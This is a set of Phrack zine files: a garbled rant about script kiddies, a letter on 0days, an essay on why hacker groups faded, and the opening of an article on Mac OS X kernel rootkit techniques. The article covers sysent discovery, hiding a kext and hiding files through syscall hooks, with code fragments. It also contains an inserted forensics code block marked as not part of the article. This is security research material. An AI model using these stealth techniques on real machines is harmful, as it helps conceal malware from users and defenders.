kiddie. Ah... binary. <3)))O and Neurosis

Let's use furries as a metaphor. Are all furries egomaniacs? Selfish
narciscists as a pox on the Internet? Of course not. Many furries are
talented. In fact, you may just discover that furries are thef auna of the
Internet. (They rock the root servers. No joke. You know what I mean
eyman.) Yet due to the nature of the furry community, there is an inherent
plague of narcissism, of taking credit for the artists they so deistically
worship. QUHTGLVHSQWIUHETHUEBHAOPQVNCPWET3220qalfafLHUEILW Erasure.)
Indeed, these furries act as a metaphor for 4 four floor ceil float [F9]
Good. These furries act as a metaphor for script kiddies. The skids.

(White Mantis is a very good furry artist...)

Skids narcissistically take advantage of your artwork and pretend to praise
you for it. Of course, they never praise you-- they're badass ahckers be-
cause they take advantage of you. And you poured your heart out into that
exploit too, didn't you? You stumbled into that bug and you travelled to
the darkest depths of the kernel for months-- even years!-- to understand
not only how to discover its presence, but equally, to harness it, to
throw a saddle on that dragon and ride it to root.

And they -bragged- about it? They smugly proclaimed their power because of
-your- research? Then they turned around and asked you, hey, where's the
next one? Man, that hit you gave me last time, gosh, that was so powerful,
so verys trong, may I have another and steal the fame you don't even want
you fucking nerd?

Skids aren't inherenty white-hats, no. But lots and lots of white-hats?
Yeah. Fucking skids.

White-hats have a desire to defend. But too many of them are drowning in
the mammal sauce (https://www.youtube.com/watch?v=_MbhPWud8kM) of their
exceedingly egotistical bullshit. Another metaphor could be said here, but
darlings, live for the swarm. StarCraft leak.

White-hats are not your enemy. This community needs defenders. Defenders
are the dualism to attackers. A good defender can stop a good attacker and
bring everything to a standstill. You know the scene:
https://www.youtube.com/watch?v=5oPsvq81n2A

Defenders assist your existance. Attackers assist your existance. For in
this community, we are one and or other but not xor: a ternary system.
Attack defend and blend.

Your enemy are the skids. Kill the skids by overdosing them. Taunt them.
But you must first give them the opportunity to kill their ego. For the
best hackers k https://www.youtube.com/watch?v=S0JfwiHjVIg [F9] [F9] [F9] 

u mad bro[F9] [F9] [F9] [F9] [F9] [F9] [F9] [F9] [F9] [F9] 

Hehe. Good. :)

For the best hackers have killed their egos. All that's left is the id...
and the superego.

More powerful than a white-hat!

Faster than a screaming zero-day!

Mom didn't watch much SuperMan... but you get the point. :)

The hacker community is so very diverse and wonderful. And it's all because
the true tinkerers of this community ahve found a variety of ways to
slaughter egos. Those egos that can't be killed with kindness and through
coersion? Well... you've read ZF0.

I'd like to remix something for you:

http://teacher.scholastic.com/activities/immigration
timeline_photos/1892_small_fullsize.jpg

>>> Give us your packers, your crackers, your exploit authors and strange
>>> artists, your Jolt-chugging CTF players competing just to play. The
>>> Mr. The Plagues spreading the plagues of their obfuscated payloads.
>>> Kill these, your egos, the tempest-noise of your science, we bite our
>>> thumb at thee who does not see my children are brilliant. And deserve
>>> steak.

Kill the skids. And ask your local kids: who the fuck are dids? For they
are tit-for-tat and one in the same rhythym..

----

Shouts: Fuck shouts. This is for all of you. :)

Haters: I love you. Refute me with your wicked science.

Closing notes:

WATCH

MISTER

ROBOT

VERY

CLOSELY

Take note of the inconsistencies. They're fun. Like... well. :)

First: https://www.youtube.com/watch?v=Wru2aDvmpT0

In conclusion: https://www.youtube.com/watch?v=zAB5AC9yhY0

And: https://www.youtube.com/watch?v=D9RfSYOfKD0

Ellipses.

====MOM FROM MESSAGE BEGIN====


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x03 - The P0 mailz ]=---------------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

        [ We received a lot of mails related to P0. Not sure why, we have
          nothing to do with them. We publish one of them here. ]

From: patagonico
Subject: P0

I think this can be separated in two parts: Tech and non-tech
Technical: Finding bugs in a huge codebase that is 20 year old is moot.
It's like giving the proverbial fish. The codebase will always stay
hungry, and buggy. You needed to teach the developers to fish bugs, 20
years ago. Software protections and automatic tools help, but you cannot
protect for logical flaws or injections. Also, for each bug you find,
devs introduce 1000. Bug hunters will be always outnumbered.

Non-tech: Moral high horse of good hackers is a physiological
testosterone-induced illusion whose main objective is to establish a
dominance hierarchy and help you have sex and pass your genes. It does
not work. There are no girls in infosec. The girls in infosec are men.
Is it good or bad to report bugs? Time will tell. Too complex a system
to make any predictions now. It might be better to live in a world where
weapons are outdated and countries attack each other with 0days. You see
what a bomb does to a kindergarten? 0days do not do that. 0days are
elegant weapons, for a more civilized age.


|--=[ EOF ]=-------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x06 of 0x10

|=-----------------------------------------------------------------------=|
|=--------------------=[ The Fall of Hacker Groups ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ by: Strauss ]=---------------------------=|
|=-----------------------=[ strauss@phrack.org ]=------------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of Contents

0 - Intro
1 - Background
2 - Nowadays
3 - Conclusion
4 - Shouts
5 - References
6 - Notes


--[ 0 - Intro

The earlier, bigger part of hacking history often had congregations as
protagonists. From CCC in the early 80s to TESO in the 2000s, through LoD,
MoD, cDc, L0pht, and the many other sung and unsung teams of hacker heroes,
our culture was created, shaped, and immortalized by their articles, tools,
and actions.

This article discusses why recently we do not see many hacker groups
anymore, and why the ones we do, such as Anonymous and its satellite
efforts, do not succeed in having the same cultural impact as their
forefathers.


--[ 1 - Background

Hacking is, in its very essence, an underground movement. Those who take
part in it have always been the ones who (ab)used technology in ways beyond
the knowledge of the larger userbase. It is tightly linked to intense
efforts in unveiling previously unknown information as well as in sharing
these discoveries. These premises hold true for as long as we know hackers:
since computers had barely any users up until the informatic massification
of today.

The nature of the hacker interests intrinsically poses difficulties:
growing knowledge on anything is hard. It requires heavy research,
experimentation, and can turn into an endless journey if objectives are not
carefully set. Just like in any field of scientific studies, it calls for a
good amount of collaboration, an attitude which, luckily for hackers, was
greatly enabled by the advent of computer networks and, most notably, the
Internet.

Computer networks increasingly made it possible to transmit unlimited and
uncensored information across their geographical extent with little effort,
with little costs, and in virtually no time. From the communication
development standpoint, one would expect that the events that followed the
80s to our days would lead to a geometric progression in the number of
hacker communities. In effect, hacking has arguably grown. Hacker
communities, definitely not. So what went wrong?


--[ 2 - Nowadays

We live in days of limited creativity. Moreover, as contradictory as it may
seem, it looks particularly rare for creativity to arise from groups or
teams. Communities, rather than individuals, should be more intellectually
empowered to create, but lately we have been watching the force of the
solo, the age of the ego. That, of course, when we do see anything that
catches our attention for originality, which is an ever scarcer pleasure.

In "Time Wars" [1], Mark Fisher explains that post-fordism has taken us to
this catatonic inability to innovate. Our nearly obsessive compulsion for
work consumes not only our time, in the literal form of labor hours, but
our minds, by distracting us from everything else we could be doing
otherwise. These distractions include our unceasing connection to ubiquitous
media (e.g. the frequent checks for new e-mail, or accesses to social
networks on mobile devices) as well as an increased concern with financial
stability and provisioning, a concern that grows as welfare is invariably
trimmed by both the governments and the private sector.

It is important to note that our capitalist worries are more deeply rooted
in us than might seem at first, even in the most politically diverse
people. Supporting oneself is not easy, it does not come for free. Getting
some education, finding a job, staying up-to-date... regardless of what
your aspirations are, whatever you feel obliged to do is probably a lot,
already. And it likely involves a prevalence of "minding your own
business".

The unsettlement created in our thoughts affects intellectual solidarity in
even more severe ways than it does individual creation. Simply put, it is
already so difficult for one person to focus away from these
"distractions" and into inspired productivity, let alone for a group to
join in a true collective mind. The ties that bind collective-minded
parties together take dedication to build, and our egotistical concerns do
not help (see note "A"). Not only is commitment required for the actual
work to be accomplished, but also to identify the shared values and goals
that enable true human connectivity.

Notice this does not concern _collaboration_ as much as it does
_collectiveness_. Collaboration typically breaks down the creative process
in a way it can be incrementally achieved with very self-sufficient,
individualistic contributions. Such is the case in most open-source
software projects. Roles are very well segregated so that a minimum of
human integration is required, as far as most modern software development
processes go, anyway. A true "hive mind" [2] cannot exist without the
support from a stronger, more unisonant cognitive bond. Funny enough, the
popular variants of LOIC, the DDoS tool used by "Anonymous", contain a
"hive mind" feature (i.e. getting a target automatically from a given IRC
server and channel and firing your packets against it). You wish it was
that easy.

The concept of the "conscience collective" was first established by Emile
Durkheim who, in his 1893 book "The Division of Labor in Society",
expressed 'that the more primitive societies are, the more resemblances
(particularly as reflected in primitive religion) there are among the
individuals who compose them; inversely, the more civilized a people, the
more easily distinguishable its individual members', as put by R. Alun
Jones [3].

Well, following (or despite) the prosperous adoption of atheism and
agnosticism as professed on the Internet and other popular media, it is
understood that religious beliefs are at a low, taking away a bit of what
societies traditionally saw as a point of unity. In fact, there seems to be
an ever growing search for uniqueness in the modern man, especially that
from the apparently overpopulated metropolises (see note "B"). In this
never-ending crowd of interesting, outstanding personas, we want to shine
somehow, to prove ourselves different and original. In the end, it turns
into a pointless battle, against God-knows-who, for apparent singularity.
Instead of reaching for the fellow man, we want to set ourselves apart, and
thus, remarkable.


--[ 3 - Conclusion

Modern life nearly conspires against the collective. We are tormented by a
relentless flow of information as well as the daily worries of an eternally
insecure, unwarranted life. Furthermore, we dread the thought of being
alike, of sharing multiple views and opinions. As such, we are turning
progressively judgemental of who we should be partnering with, on the basis
that "they do not understand". In hacking, this further bears on the
delicate subject of trust, which would require an essay of its own, given
the undeniable importance the matter has acquired over the years.

If our thoughts on creating hacker groups were to be summarized, this is
how they would look: No one ever feels like we do. They are not to be
trusted and we do not have the time for them. The only attitude consonant
to our search for a comfortable, safe life is to constrain ourselves to our
own limitations, ignore the intelligent life out there, and surrender to
the mediocrity that our society has condemned our leisure time to.


--[ 4 - Shouts

My only acknowledgements go to whoever reads this through and puts his/her
thoughts to it. I eagerly await your comments.


--[ 5 - References

[1] "Time Wars", Mark Fisher - http://www.gonzocircus.com/xtrpgs/
      incubate-special-exclusive-essay-time-wars-by-mark-fisher/
[2] "Collective Consciousness", Wikipedia -
      http://en.wikipedia.org/wiki/Collective_consciousness
[3] Excerpt of "Emile Durkheim: An Introduction to Four Major Works",
      Robert Alun Jones - http://durkheim.uchicago.edu/Summaries/dl.html


--[ 6 - Notes

A) In respect to social networks, while they are a valid community-building
mechanism in nature, selfishness prevails in common usage, by means of the
indulgent pleasure that fuels chronic "pluggedness", at times voyeur, at
times exhibitionist and needy.

B) It is arguably the case, though, that the globalizing aspect of the
Internet has brought the feeling of upsetting commonality to the citizens
of even the more unpopulated places.


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x07 of 0x10

|=-----------------------------------------------------------------------=|
|=-------------=[ Revisiting Mac OS X Kernel Rootkits ]=-----------------=|
|=-----------------------------------------------------------------------=|
|=---------------------=[ fG! <phrack@put.as> ]=-------------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of contents

  1 - Introduction
  2 - The classic problems
      2.1 - What is new since Tiger
      2.2 - Sysent table discovery techniques
      2.3 - Hiding the kext
      2.4 - Hiding files
      2.5 - Hiding processes
      2.6 - Modifying the syscall handler
  3 - Reading the filesystem from kernel land
      3.1 - Real short overview of VFS
      3.2 - The easy way - Apple loves rootkit authors!
      3.3 - The more complex way
      3.4 - Solving kernel symbols
  4 - Executing userland binaries from the kernel
      4.1 - Writing from kernel memory into userland processes
      4.2 - Abusing (again!) dyld to inject and run code
      4.3 - Finding the place to execute the injection
      4.4 - Ideas are great, execution is everything
      4.5 - The dynamic library
      4.6 - Hiding our tracks
  5 - Revisiting userland<->kernel communication
      5.1 - Character devices and ioctl
      5.2 - Kernel control KPI
      5.3 - Ideas for our own alternative channels
  6 - Anti-forensics
      6.1 - Cheap tricks to reduce our footprint
      6.2 - Attacking DTrace and other instrumentation features
          6.2.1 - FSEvents
          6.2.2 - kdebug
          6.2.3 - TrustedBSD
          6.2.4 - Auditing - Basic Security Module
          6.2.5 - DTrace
              6.2.5.1 - syscall provider
              6.2.5.2 - fbt provider
      6.3 - AV-Monster II
      6.4 - Bypassing Little Snitch
      6.5 - Zombie rootkits
  7 - Caveats & Detection
  8 - Final words
  9 - References
  10 - T3h l337 c0d3z


--[ 1 - Introduction

In Phrack #66, ghalen and wowie wrote about interesting OS X kernel
rootkit techniques. That article is almost 4 years old and 4 major OS X
releases behind. Today Mountain Lion is king and many of the presented
techniques are not valid anymore - Apple reacted and closed those "holes".

One hand is enough to count the number of known rootkits targeting
Apple's OS. The most recent public release was Rubilyn [2], a simple
rootkit that works with Lion (v10.7) (if you can read Korean there is
a very interesting memory forensics analysis at [3]).

The commercial spyware industry recently leaked DaVinci (aka OS.X/Crisis),
a user/kernel rootkit with some interesting features and flaws [4]. There
are rumours about FinFisher but no OS X leak happened yet. Everything
else is too old and outdated.

The main goal of this article is to update public knowledge and
introduce some "new" techniques so both offensive and defensive sides
can improve. It is focused on the current version at the time of this
writing, Mountain Lion, v10.8.2.

The defensive knowledge and available tools are still poor. I hope
this article motivates others to invest time and resources to improve
this scenario. It is quite certain that the offensive knowledge is
significantly ahead.

I tried to make this article as complete as possible but there is so
much work to be done that it is a never-ending story. Some of the
proposed solutions can be improved or implemented in different and/or
better ways. You are encouraged to improve or develop new approaches
and of course publish them. I also like to learn from others ;-)

I hope you enjoy this (long) journey.
fG!


--[ 2 - The classic problems

This section starts by introducing important changes made since Tiger.
Then it discusses the old sysent retrieval techniques and their problems,
and presents a solution compatible with past, current, and future OS
X versions.

It continues with improvements to classic rootkit features - hide and
avoid (easy) detection. It should be noted that these were developed
before the in-kernel symbol resolution technique to be presented later,
so they might appear a bit unsophisticated. I think there is value in this
knowledge and that is why it is described under the original conditions.


----[ 2.1 - What is new since Tiger

The easiest spot to hook the system calls, and the favourite of many, is
the sysent table - just replace a pointer and we are set. Apple has been
improving the defence of that "castle" by hiding the sysent table symbol
and moving its location.

In Mountain Lion the table is now located in read-only memory (not a
big problem anyway). Syscall hijacking techniques like these can be
easily found with basic analysis tools, but they are still interesting
and useful for other purposes, as will be shown later.

Another important change is that the kernel module list (kmod_info_t) is
deprecated. Before, the kernel extension rootkit could be easily hidden
from kextstat by manipulating this list. Now we must patch an I/O Kit
OSArray class called sLoadedKexts to hide from tools that list loaded
kernel extensions. Snare was the first to publicly discuss this issue,
and the commercial spyware OS.X/Crisis the first (afaik) to implement
it. Its technique will be described later.

Mountain Lion finally introduced kernel ASLR. It might be harder to
develop and execute the necessary exploit to install the rootkit but
after that it is (mostly) business as usual.

Up to Snow Leopard, Apple removed the symbol table from the kernel space
so there was no easy way to solve non-exported symbols inside the kernel
extension or I/O Kit driver. This was changed in Lion by leaving the full
__LINKEDIT segment in kernel memory but marked as pageable. Snare shows
this in one of his posts [5] and rubilyn rootkit uses it. Beware that
the formula they use has a small problem - it assumes that the symbol
table is located at the beginning of __LINKEDIT. This is true in Lion
but not in Mountain Lion.

I will show you a solution that is stable, simple, and compatible
with all OS X versions. Too good to be true! :-)


----[ 2.2 - Sysent table discovery techniques

As described in the Phrack 66 article, Landon Fuller [6] was the first to
go public with a technique to solve the removal of the exported sysent
symbol. His technique is based on the distance between the (still) exported
nsysent symbol (the number of entries in the sysent table, aka, number
of syscalls) and sysent. The problem with this approach is that Apple
can move the location of sysent between releases - offsets will change
and the rootkit will fail and expose itself. Not acceptable!

Let's illustrate this with an example, starting with Mountain Lion 10.8.2:

$ nm /mach_kernel | grep nsysent
ffffff8000839818 D _nsysent

The location of sysent can be found by disassembling the kernel and
using one of the three functions that reference it:

- unix_syscall
- unix_syscall64
- unix_syscall_return

For 10.8.2 the sysent pointer will be located at 0xFFFFFF80008000D0
and the table located at 0xFFFFFF8000855840. Landon's formula does not
apply here.

In Lion 10.7.5 we have:

$ nm mach_kernel_10_7_5 | grep nsysent
ffffff8000846ed8 D _nsysent

And sysent located at 0xFFFFFF8000842A40.

This confirms Apple moving around the pointer between different
releases. Notice that all previous values are from the kernel on disk so no
kernel ASLR slide is included. The slide value will be disclosed whenever
it is being used in the examples.

Another technique is described in The Mac Hacker's Handbook [7], released
in 2009 and targeting Leopard.

On page 332 there is a code snippet that searches memory for "something
that has the same structure as the sysent table.". The starting search
point is the nsysent symbol, increasing the memory pointer to lookup
and match sysent array elements.

That code snippet does not work with Snow Leopard because the sysent array
is located before the nsysent symbol. It must be modified to support specific
versions and releases.

These different examples demonstrate that Apple changes sysent location
between releases. A stable rootkit requires a universal technique.

The second technique can be adapted to cover all cases. First we would
scan memory addresses above nsysent and then below if initial search
failed. If nsysent also stops being exported we would need to base the
search in another symbol and continue the cat & mouse game.

The reference symbol problem can be easily solved using a feature of
x86 systems, the interrupt descriptor table (IDT). The IDT "is used
by the processor to determine the correct response to interrupts and
exceptions." [8]. The traditional implementation of syscalls is done via
interrupt 80. The response to this interrupt will be executed by a kernel
function pointed to by the IDT. IDT's location can be obtained using the
asm instruction "sidt" (store interrupt descriptor table register). It
returns the table location so the next step is to find out the address
of the interrupt 80 handler.

Once we have the interrupt 80 handler address we can find out the
base address of the kernel. Kernel ASLR does not matter here because
the handler address is always a valid kernel code location - we are
dynamically querying the system and not using fixed addresses. To find
the kernel base address is just a matter of searching memory back for
the magic value of the Mach-O header - 0xfeedfacf (64 bits) or 0xfeedface
(32 bits).

One (curious) property of kernel ASLR implementation is that memory
addresses in kernel and kexts Mach-O headers already contain the ASLR
slide, something that does not happen in userland ASLR'ed binaries. The
header in userland binaries is never updated so it is not synced with
the address where the binary is loaded at.

The next step is to process the Mach-O headers and find out where the
__DATA segment is located. The reason for this is that the sysent table
is located in there - we need to extract segment's start address and
boundaries. Now it is just a matter of searching memory for something
that matches the sysent table.

Are there any performance problems doing things like this? The sysent
location is found in less than a second even on a 5 year old Core 2 Duo
Macbook Pro. The performance impact can be considered meaningless.

This method was applied successfully when the first Mountain Lion
developer preview became available and still works up to 10.8.2.

You can find its implementation in the included source code at the end.
A userland version that uses /dev/kmem to extract the same information
is available at [9].

What is the difference against using any other exported symbol instead
of all the trouble with the interrupt handler? Honestly, it is just a
matter of personal preference and technical "prowess". A symbol that
breaks compatibility if removed could be used instead with very low risk
of Apple changing it. Later, we will need to use at least one KPI so
almost any symbol from it can be used as search's starting point.

Another solution is to use one MSR register involved in the SYSCALL
instruction. A good candidate is the MSR register number 0xC0000082
(MSR_IA32_LSTAR), which contains the SYSCALL entrypoint.

One way to get its value in 64 bits is the following (ripped from XNU):

#define rdmsr(msr,lo,hi) \
__asm__ volatile("rdmsr" : "=a" (lo), "=d" (hi) : "c" (msr))

static inline uint64_t rdmsr64(uint32_t msr)
{
    uint32_t lo=0, hi=0;
    rdmsr(msr, lo, hi);
    return (((uint64_t)hi) << 32) | ((uint64_t)lo);
}

Calling rdmsr64(0xC0000082) will return the kernel address that will
handle 64 bits syscalls via the SYSCALL interface. The register number
0x176 (MSR_IA32_SYSENTER_EIP) is the one we are interested in for 32
bits systems - it is used for 32 bits syscalls via SYSENTER.

These are just a few possibilities to retrieve a valid address inside
the running kernel and then find the start address of the kernel Mach-O
header and sysent location. The location of the Mach-O header will be
useful to compute the kernel ASLR value (the slide is stored in a kernel
variable but its symbol is not exported!).
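
The header walk described above, as a memory-forensics tool would run it
over a captured image to recover the segment bounds and the kernel ASLR
slide. This is an added example, not code from this article or from XNU;
the sample image, its addresses and the function names are constructed for
the illustration, and a page-aligned header is assumed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define MH_MAGIC_64   0xfeedfacfu            /* 64-bit magic quoted in the text */
#define LC_SEGMENT_64 0x19u
#define PAGE          4096u
#define DISK_TEXT     0xffffff8000200000ULL  /* constructed on-disk __TEXT vmaddr */
#define SLIDE         0x000000001a600000ULL  /* constructed slide for the sample */

struct mach_header_64 {   /* minimal copies of the <mach-o/loader.h> layouts */
    uint32_t magic, cputype, cpusubtype, filetype;
    uint32_t ncmds, sizeofcmds, flags, reserved;
};
struct load_command { uint32_t cmd, cmdsize; };
struct segment_command_64 {
    uint32_t cmd, cmdsize;
    char     segname[16];
    uint64_t vmaddr, vmsize, fileoff, filesize;
    uint32_t maxprot, initprot, nsects, flags;
};

/* Step back a page at a time from an offset known to lie inside the image
 * until the magic appears (a page-aligned header is assumed). -1 if absent. */
static long find_macho_header(const uint8_t *img, size_t len, size_t start)
{
    for (size_t off = start - (start % PAGE); ; off -= PAGE) {
        uint32_t magic = 0;
        if (off <= len && len - off >= sizeof(struct mach_header_64))
            memcpy(&magic, img + off, sizeof magic);
        if (magic == MH_MAGIC_64) return (long)off;
        if (off < PAGE) return -1;
    }
}

/* Walk the load commands, bounds-checking every size field because a capture
 * can be truncated or tampered with, and copy out the named segment. */
static int find_segment(const uint8_t *img, size_t len, size_t hdr,
                        const char *name, struct segment_command_64 *out)
{
    struct mach_header_64 mh;
    if (hdr > len || len - hdr < sizeof mh) return -1;
    memcpy(&mh, img + hdr, sizeof mh);
    if (mh.magic != MH_MAGIC_64) return -1;
    size_t off = hdr + sizeof mh;
    if (mh.sizeofcmds > len - off) return -1;
    size_t end = off + mh.sizeofcmds;
    for (uint32_t i = 0; i < mh.ncmds; i++) {
        struct load_command lc;
        if (end - off < sizeof lc) return -1;
        memcpy(&lc, img + off, sizeof lc);
        if (lc.cmdsize < sizeof lc || lc.cmdsize > end - off) return -1;
        if (lc.cmd == LC_SEGMENT_64 && lc.cmdsize >= sizeof *out) {
            memcpy(out, img + off, sizeof *out);
            if (strncmp(out->segname, name, sizeof out->segname) == 0) return 0;
        }
        off += lc.cmdsize;
    }
    return -1;
}

/* The in-memory header carries the slide: in-memory minus on-disk __TEXT. */
static int kernel_slide(const uint8_t *img, size_t len, size_t hdr,
                        uint64_t disk_text, uint64_t *slide)
{
    struct segment_command_64 text;
    if (find_segment(img, len, hdr, "__TEXT", &text) != 0) return -1;
    if (text.vmaddr < disk_text) return -1;
    *slide = text.vmaddr - disk_text;
    return 0;
}

/* Constructed sample image (len >= 2 * PAGE): Mach-O header at offset 0x1000. */
static void build_sample_image(uint8_t *img, size_t len)
{
    struct mach_header_64 mh = { MH_MAGIC_64, 0, 0, 2, 2, 0, 0, 0 };
    struct segment_command_64 seg[2] = {{0}};
    memset(img, 0, len);
    seg[0].cmd = seg[1].cmd = LC_SEGMENT_64;
    seg[0].cmdsize = seg[1].cmdsize = sizeof seg[0];
    strcpy(seg[0].segname, "__TEXT");
    seg[0].vmaddr = DISK_TEXT + SLIDE;            seg[0].vmsize = 0x600000;
    strcpy(seg[1].segname, "__DATA");
    seg[1].vmaddr = DISK_TEXT + SLIDE + 0x600000; seg[1].vmsize = 0x200000;
    mh.sizeofcmds = sizeof seg;
    memcpy(img + PAGE, &mh, sizeof mh);
    memcpy(img + PAGE + sizeof mh, seg, sizeof seg);
}

int main(void)
{
    static uint8_t img[4 * PAGE];
    uint64_t slide = 0;
    build_sample_image(img, sizeof img);
    long hdr = find_macho_header(img, sizeof img, 0x2abc);
    if (hdr < 0 || kernel_slide(img, sizeof img, (size_t)hdr, DISK_TEXT, &slide))
        return 1;
    printf("header at 0x%lx, slide 0x%llx\n", hdr, (unsigned long long)slide);
    return 0;
}
```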


----[ 2.3 - Hiding the kext

As mentioned before, the kernel module list is deprecated in favor of an
IOKit OSArray class called sLoadedKexts. This introduces a new problem:
how to find its location since we are talking about IOKIT C++. The
OS.X/Crisis spyware implemented an interesting solution. It leverages
a simple IOKit method that references sLoadedKexts to find the object
location.

The method is OSKext::lookupKextWithLoadTag [libkern/c++/OSKext.cpp]:

OSKext * OSKext::lookupKextWithLoadTag(uint32_t aTag)
{
    OSKext * foundKext = NULL;  // returned
    uint32_t count, i;

    IORecursiveLockLock(sKextLock);

    count = sLoadedKexts->getCount(); // <- use this location, for example
    for (i = 0; i < count; i++) {
        OSKext * thisKext = OSDynamicCast(OSKext,
            sLoadedKexts->getObject(i));
        if (thisKext->getLoadTag() == aTag) {
            foundKext = thisKext;
            foundKext->retain();
            goto finish;
        }
    }
finish:
    IORecursiveLockUnlock(sKextLock);
    return foundKext;
}

There is no symbol resolution feature inside the Crisis kernel rootkit
- the symbol (__ZN6OSKext21lookupKextWithLoadTagEj) is solved by the
userland component and sent to the rootkit module via a sysctl. The
function that hides the rootkit starts by searching for the 0xE8 byte
corresponding to the IORecursiveLockLock() call. All searches are done
using hex patterns. It then uses fixed offsets to compute the location
of the array and modify it. The provided source code reimplements
this technique.

The search could be made easier (and portable?) by disassembling this
method. The good news is that we can have an x86/x64 disassembler inside
a kernel extension thanks to diStorm [19] (other libraries probably
work but I'm a fan of diStorm, in particular after the introduction of
the decompose interface). To statically compile diStorm just import the
source and include files into your rootkit project. You also need to
define SUPPORT_64BIT_OFFSET or uncomment it at config.h.

Assuming we have no method to find kernel symbols inside the rootkit
(this will be later developed), we can use the disassembling engine
to try to find the functions or methods that we are interested in. The
whole __text section can be disassembled and searched for instruction
patterns that are hopefully more stable than hex patterns.

Testing this approach I was able to find the method referenced above with
a precision of 100% or 50%. The different rates depend on how strict the
search parameters are, due to some differences between compiler output in
kernel versions. I'm talking about the number of calls, jmps, jnz, jae,
which have small variations between some versions (compiler upgrades,
settings, etc). The performance is amazing - it takes 1 second to
disassemble and search the whole kernel using a high-end Intel i7 cpu.

The main problem of Crisis's approach is that it depends on fixed offsets
inside the OSArray class. If anything changes it will break compatibility
and potentially crash or expose the rootkit.

Disassembling the kernel is useful to find patterns and leverage them
in different cases. It is not perfect and does not solve all our problems
but it is another helpful tool.


----[ 2.4 - Hiding files

Files are hidden by modifying (at least) three different syscalls:
getdirentries, getdirentriesattr, and getdirentries64. Nothing new and
thoroughly described before.

What usually happens is that only the filename is matched - that is the
information directly available from the structures available in those
three syscalls. This means that a filename to be hidden will be matched
in any folder, something that can raise suspicion if a common filename
is used. With a small effort we can do better and learn something in
the process.

Let's find out how to recover additional information to match specific
file or folder locations. Target function is getdirentries64 but the
concepts apply to the other two.

The structure that is commonly manipulated is:

struct direntry {
  __uint64_t  d_ino;      /* file number of entry */
  __uint64_t  d_seekoff;  /* seek offset (optional, used by servers) */
  __uint16_t  d_reclen;   /* length of this record */
  __uint16_t  d_namlen;   /* length of string in d_name */
  __uint8_t   d_type;     /* file type, see below */
  char d_name[__DARWIN_MAXPATHLEN]; /*entry name (up to MAXPATHLEN bytes)*/
};

The match is done against the field d_name, which only contains the
current file or folder without the full path. This is the reason why
most implementations only match the file anywhere in the filesystem.

Luckily for us, all syscall function prototypes contain the proc
structure as the first parameter. It contains enough information to
match the full pathname.

struct proc {
(...)
    struct  filedesc *p_fd;        /* Ptr to open files structure. */
(...)
}

struct filedesc {
    struct  fileproc **fd_ofiles;   /* file structures for open files */
    char    *fd_ofileflags;         /* per-process open file flags */
    struct  vnode *fd_cdir;         /* current directory */
    struct  vnode *fd_rdir;         /* root directory */
    int     fd_nfiles;              /* number of open files allocated */
    int     fd_lastfile;            /* high-water mark of fd_ofiles */
    (...)
};

For example, to display all the open files by an arbitrary process
calling getdirentries64, we could use the following code:

void show_all_openfiles(struct proc *p)
{
    // lock proc structure else we are asking for trouble
    (*proc_fdlock)(p);
    struct filedesc *fd = p->p_fd;
    if (fd != NULL)
    {
        // for some reason fd_nfiles is not useful for this
        int lastfile = fd->fd_lastfile;
        // show all open files for this proc; fd_lastfile is the index of
        // the highest descriptor in use, so the bound is inclusive
        for (int count = 0; count <= lastfile; count++)
        {
            // fd_ofiles is an array of fileproc that contains file structs
            // for all open files
            struct fileproc *fp = fd->fd_ofiles[count];
            // we are only interested in files so match fg_type field
            if (fp != NULL &&
                fp->f_fglob != NULL &&
                fp->f_fglob->fg_type == DTYPE_VNODE)
            {
                // lock the vnode - fg_data cast depends on fg_type
                // type is vnode so we know fg_data will point to a vnode_t
                (*vnode_lock)((struct vnode*)fp->f_fglob->fg_data);
                struct vnode *vn = (struct vnode*)fp->f_fglob->fg_data;
                if (vn->v_name != NULL)
                {
                    printf("[%d] Filename: %s\n", count, vn->v_name);
                }
                (*vnode_unlock)((struct vnode*)fp->f_fglob->fg_data);
            }
        }
    }
    (*proc_fdunlock)(p);
}

The files listed by this function are not the files we want to hide but
the files opened by the binary calling this syscall. This information
can be used, for example, to find the path that a "ls" command is trying
to list. The full path can be extracted manually by iterating over the
vnodes of each file, or by using a KPI function (vn_getpath).

To build the path from vnodes, first we retrieve the vnode structure
corresponding to the file and then iterate up to the filesystem
root - each vnode has a reference to its parent vnode.

struct vnode {
(...)
    const char *v_name;      /* name component of the vnode */
    vnode_t v_parent;        /* pointer to parent vnode */
(...)
}

Each path component can be sequentially matched until v_parent == NULLVP,
which means the filesystem root. If the path matches what we want to hide
then it is a matter of removing that entry from direntry array as usual.

To find the folder or file being listed we can use the following trick,
which seems to hold true:

int lastfile = main_fd->fd_lastfile;
// lastfile has the information we are looking for
struct fileproc *last_fp = main_fd->fd_ofiles[lastfile];

The only word of caution is when shell expansion is involved. In this case
last file entry name will be a "ttys" and we need to iterate fd_ofiles
array looking for the previous element to "ttys" - it is not lastfile-1.

It looks complicated but it is not; it is just a matter of looking up
the necessary information in kernel structures. The proc structure is
extremely rich and a good starting point for many hacks. The biggest
problem is that it changes frequently between major OS X versions.

With so many kernel functions available it is almost certain there is
already a function that saves us from building the path as described
above. That function is vn_getpath() from bsd/sys/vnode.h.

/*!
 @function vn_getpath
 @abstract Construct the path to a vnode.
 @discussion Paths to vnodes are not always straightforward: a file with
multiple hard-links will have multiple pathnames, and it is sometimes
impossible to determine a vnode's full path. vn_getpath() will not enter
the filesystem.
 @param vp The vnode whose path to obtain.
 @param pathbuf Destination for pathname; should be of size MAXPATHLEN
 @param len Destination for length of resulting path string. Result will
include NULL-terminator in count--that is, "len"
 will be strlen(pathbuf) + 1.
 @return 0 for success or an error code.
 */
int vn_getpath(struct vnode *vp, char *pathbuf, int *len);

We still need to retrieve a vnode from the proc structure to use this
function. To find the vnode we can use the lastfile trick to find the
target path, retrieve its vnode and then use this function to get the
full path.

